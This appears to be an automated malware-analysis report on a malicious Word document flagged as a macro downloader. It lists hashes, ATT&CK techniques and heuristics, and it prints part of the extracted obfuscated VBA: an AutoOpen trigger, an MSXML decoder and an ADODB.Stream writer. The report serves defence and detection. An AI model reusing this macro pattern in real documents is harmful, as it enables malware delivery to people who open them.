Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 53473ac925204fad…

MALICIOUS

Office (OLE)

163.5 KB · Created: 2017-05-02 21:49:00 · Authoring application: Microsoft Office Word · First seen: 2017-05-13
MD5: 83f586b14963657c2a65771a10e04772 SHA-1: 4f16c06736df317275e1519779548200341c010c SHA-256: 53473ac925204fad22ff7a7d97c5d462bb3f6c83f48919ececfa4191a3f18caf
Risk score: 282

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1204.002 User Execution: Malicious File · T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros with an AutoOpen procedure, a common technique for executing code as soon as the document is opened. The macro uses CreateObject to instantiate COM objects (msxml2.domdocument and adodb.stream in the extracted source), a pattern consistent with decoding an embedded blob and writing it to disk before staging a second-stage payload. The Shell() and CreateObject calls, together with the ClamAV detection, strongly indicate downloader functionality.

Heuristics 8

  • ClamAV: Doc.Downloader.WithMacro-6310867-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.WithMacro-6310867-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches documents whose macro exists only as p-code, or whose source extraction failed, so that no readable source is available.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface; on its own it does not attribute downloader behaviour or a parser CVE.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 17274 bytes
SHA-256: 5656c89f56e0cd6755e775e728c26d2a56905a1ad6602870a488d256758d6e82
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub AutoOpen()
' Auto-execution entry point: Word runs this procedure when the document is
' opened with macros enabled. Both locals below are assigned and never read,
' so they are padding; the only effective statement is the call to tMKnYf,
' whose definition is not within this preview.

Dim dVWk5 As Boolean
dVWk5 = False
Dim JSrsv As Byte
JSrsv = 73
tMKnYf ' all real work is delegated here (procedure defined outside the visible listing)
End Sub

Attribute VB_Name = "Module2"
Public Function x4APV(ByVal Uwtaql1)
' Decodes its string argument through an MSXML DOM element and passes the
' result to R1iB8j96d (defined below; that function's body runs past the end
' of this preview, where it opens an ADODB.Stream and writes the bytes).
' Almost every Dim/assignment in this function writes a local that is never
' read again — padding intended to bury the handful of live statements. The
' live statements are: the CreateObject and CreateElement calls, the DataType
' and Text assignments inside the With block, the nodeTypedValue read that
' feeds R1iB8j96d, and the two Set ... = Nothing releases at the end.
' For detection, key on the COM ProgIDs ("msxml2.domdocument" here,
' "adodb.stream" in R1iB8j96d) rather than the identifiers, which are
' randomised per sample.
'   Uwtaql1 — encoded payload text; its caller is outside this preview, so
'             the origin of the data is not visible here.
'   Returns whatever R1iB8j96d returns for the decoded value.

Dim shjq34R As Long
shjq34R = 0
Dim HwPDXehR As Double
HwPDXehR = Sgn(6849.5910574052)
Dim MvkaC0Tbw As Byte
MvkaC0Tbw = 36
Dim FZtWpM
Dim zcH8Zbk
Dim PSyfAlH As Integer
PSyfAlH = Sgn(-30739)
Dim jDlZax1j5
' Several padding lines read names (VXnGKf0k, Vhk681, QVAdl, I2b9ESA, ESgrY3,
' UYqOy) that are declared nowhere in this preview.
' NOTE(review): presumably undeclared Variants (no Option Explicit is shown),
' which evaluate as Empty without raising — confirm against the full module.
jDlZax1j5 = StrConv(VXnGKf0k, vbLowerCase)
Dim MFYdZMx As Long
MFYdZMx = 0
Dim Yv3xQE As String
Yv3xQE = Len(Vhk681)
Dim M10CzTp As String
M10CzTp = AscW("B")
Dim xmj9k As Integer
xmj9k = Sgn(7638)
Dim ekSmba As Integer
ekSmba = 15304
Dim Z3ZyTvM As Byte
Z3ZyTvM = 234
Dim QVXLICU
QVXLICU = RTrim(QVAdl)
Dim iuPny As Boolean
iuPny = True
' Live: an MSXML DOM is instantiated purely as a decoder — nothing in this
' function ever loads or parses XML.
Set FZtWpM = CreateObject("msxml2.domdocument")
Dim igCEz1 As Integer
igCEz1 = Sgn(13366)
Dim yW9lycVI As Integer
yW9lycVI = Sgn(-12574)
' Live: the element name comes from sgb39, which is not defined in this preview.
Set zcH8Zbk = FZtWpM.CreateElement(sgb39)

Dim JM13A8rsm As Byte
JM13A8rsm = 243
Dim WsdMUfA As Double
WsdMUfA = 41160.904586662
Dim og0fzWd6 As Integer
og0fzWd6 = Sgn(-5342)
Dim JA03K As Boolean
JA03K = True
Dim Tc2SlT6G As Double
Tc2SlT6G = Round(15725.337883158)
Dim CduyHCXRA As Single
CduyHCXRA = Val(13477.523641112)
' The With block never uses the leading-dot form; it qualifies zcH8Zbk
' explicitly, so the With adds nothing except visual noise.
With zcH8Zbk

Dim iPgh2fk As Boolean
iPgh2fk = True
Dim Wne5yd As Long
Wne5yd = -1190783454
Dim U18ZfnwA As Boolean
U18ZfnwA = False
Dim W5cgx As Long
W5cgx = Sgn(0)
Dim mtfyO As Boolean
mtfyO = True
' Live: sets the element's typed-data encoding to "bin." & sgb39.
' NOTE(review): MSXML accepts dataType values such as "bin.base64" and
' "bin.hex", so sgb39 is presumably one of those suffixes — confirm from the
' full module.
zcH8Zbk.DataType = "bin." & sgb39
Dim VXzRT5vlZ As Integer
VXzRT5vlZ = Sgn(-135)
Dim AbQ7wp As Long
AbQ7wp = 0
' Live: the encoded input becomes the element's text.
zcH8Zbk.Text = Uwtaql1
End With

Dim x4LUaw As Long
x4LUaw = 0
Dim iNMVEh As Boolean
iNMVEh = True
Dim Xu9gT As Boolean
Xu9gT = True
Dim xh0VA2Rr As Byte
xh0VA2Rr = 214
Dim UbO82 As Integer
UbO82 = 15224
' Live: nodeTypedValue returns the text decoded according to DataType; that
' value is handed to R1iB8j96d, which writes it into an ADODB.Stream.
x4APV = R1iB8j96d(zcH8Zbk.nodeTypedValue)
Dim MkJaL
MkJaL = UCase(I2b9ESA)
Dim eNGElC As Byte
eNGElC = 49
Dim wnolKZ As Integer
wnolKZ = Sgn(-20763)
Dim RAHuDp5 As String
RAHuDp5 = ESgrY3
Dim PtldT
PtldT = Len(UYqOy)
' Live: release the COM objects.
Set zcH8Zbk = Nothing
Set FZtWpM = Nothing
End Function
Function R1iB8j96d(Binary)

Dim hEFfb As Byte
hEFfb = 80
Dim ojVQMPI1 As Byte
ojVQMPI1 = 166
Dim okvKA As Double
okvKA = Int(30322.678039902)
Dim xulK8f As Boolean
xulK8f = True
Dim IjgfuEt As Byte
IjgfuEt = 124
Const IPY6x = 2
Const U0Sy8Og = 1
Dim X7KHpLPm As Double
X7KHpLPm = Round(51060.71705188)
Dim Hbluo8 As Boolean
Hbluo8 = False
Dim cBStZ5
Dim ArWYeq As Single
ArWYeq = Sgn(25629.27534658)
Dim BfQKz As Byte
BfQKz = 255
Dim ziLElr As Integer
ziLElr = Sgn(18883)
Dim zaAGH As Single
zaAGH = Sgn(42667.789562611)

Dim ZqMsjtQ3 As Boolean
ZqMsjtQ3 = False
Dim lNguMEo As Byte
lNguMEo = 247
Set cBStZ5 = CreateObject("adodb.stream")

Dim zZj3g As Boolean
zZj3g = False
Dim AdhSf3p As Boolean
AdhSf3p = False
Dim Dpy9DT
Dpy9DT = Len(lbW6z3BI9)
Dim zpoGS As Byte
zpoGS = 63
With cBStZ5

Dim OJm0AI As Boolean
OJm0AI = False
Dim bsNx8kc As String
bsNx8kc = Trim(yISDh2)
Dim k9XGwzpJN As Integer
k9XGwzpJN = Sgn(-7085)
Dim isH9Ph As Boolean
isH9Ph = True
Dim wlCdDHrX As Boolean
wlCdDHrX = True
Dim nyeS0KACG As Byte
nyeS0KACG = 51
.Type = U0Sy8Og
Dim UxvZsTwY As Double
UxvZsTwY = Fix(34822.261297741)
Dim XIdRs As Byte
XIdRs = 8
Dim JuG76 As Integer
JuG76 = -16313
.Open
Dim mPfTG As String
mPfTG = LCase(SNQhVf)
Dim p3wWc As Byte
p3wWc = 19
Dim PrIJUY8 As String
PrIJUY8 = StrConv(oTlZ16wV, vbLowerCase)
Dim xBWMD As Byte
xBWMD = 21
Dim TLARfltr4 As String
TLARfltr4 = Val(aiVX7DJv)
.Write Binary
Dim xVNCx7 As Integer
xVNCx7 = Sgn(2815)
Dim MEVxNF2l As Byte
MEVxNF2l = 156
Dim SQlG8 As Boolean
SQlG8 = False
Dim UR3zACWG4 As Byte
UR3zACWG4 = 215
Dim WCR3z0M As Long
WCR3z0M = 0
.Position = 0

Dim Aiaro9g As Byte
Aiaro9g = 77

... (truncated)